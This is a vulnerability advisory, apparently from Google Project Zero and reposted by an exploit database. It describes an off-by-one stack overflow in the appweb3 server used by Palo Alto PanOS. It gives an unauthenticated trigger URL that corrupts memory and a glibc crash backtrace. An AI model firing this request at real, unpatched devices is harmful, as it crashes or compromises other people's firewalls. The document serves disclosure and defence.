###########################

# Palo Alto Networks PanOS appweb3 Stack Buffer Overflow Vulnerability

###########################

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68
 
PanOS uses a modified version of the appweb3 embedded webserver, it's used for
a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:
 
char *mprItoa(char *buf, int size, int64 value, int radix);
 
https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463
 
The size parameter is documented to be the size of the buffer at *buf, but if
the value exceeds that it will write one more byte than that as a nul
terminator.
 
Note that appweb3 has been EOL since 2012 and no longer receives security
updates and is not supported by the developer, so security maintenance is the
responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server,
but whatever.
 
I've found an unauthenticated php script that an attacker call force to invoke
mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
called like so:
 
/unauth/php/errorPage.php?code=1e16
 
This example should corrupt the stored GOT pointer, resulting in some
unexpected routine being called on the attacker-controlled MaResponse object,
and crashing with some heap corruption.
 
*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
======= Backtrace: =========
/lib/libc.so.6[0xf7ee8786]
/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
/lib/libpthread.so.0[0xf6e9b6e1]
/lib/libc.so.6(clone+0x5e)[0xf7f52aee]
======= Memory map: ========
08048000-0804c000 rwxp 00000000 08:02 67709                              /usr/local/bin/appweb3
0804c000-095e5000 rwxp 00000000 00:00 0                                  [heap]
f1c00000-f1cd0000 rwxp 00000000 00:00 0 
 
etc.

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-21]

###########################